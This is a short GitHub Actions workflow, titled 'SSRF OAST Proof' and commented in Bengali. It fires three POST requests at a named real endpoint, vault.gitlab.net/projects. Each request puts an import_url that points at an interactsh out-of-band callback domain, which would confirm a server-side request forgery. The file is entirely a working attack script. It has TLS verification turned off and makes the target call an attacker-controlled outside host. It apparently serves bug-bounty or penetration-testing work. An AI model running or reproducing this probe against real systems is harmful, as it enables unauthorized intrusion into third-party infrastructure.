name: SSRF OAST Proof
on:
  workflow_dispatch:

jobs:
  call-oast:
    runs-on: ubuntu-latest
    env:
      TARGET: "https://vault.gitlab.net/projects"   # যে endpoint-এ POST দিচ্ছি
      OAST: "d2bbp729io6losq73gfg96yx734na5oti.oast.pro"  # তোমার interactsh ডোমেইন
    steps:
      - name: Beacon 1
        run: |
          ID=$(date +%s)1
          curl -k -sS -X POST "$TARGET" \
            -H "Content-Type: application/json" \
            -d "{\"import_url\":\"http://run-$ID.$OAST/\"}"
      - name: Beacon 2
        run: |
          ID=$(date +%s)2
          curl -k -sS -X POST "$TARGET" \
            -H "Content-Type: application/json" \
            -d "{\"import_url\":\"http://run-$ID.$OAST/\"}"
      - name: Beacon 3
        run: |
          ID=$(date +%s)3
          curl -k -sS -X POST "$TARGET" \
            -H "Content-Type: application/json" \
            -d "{\"import_url\":\"http://run-$ID.$OAST/\"}"
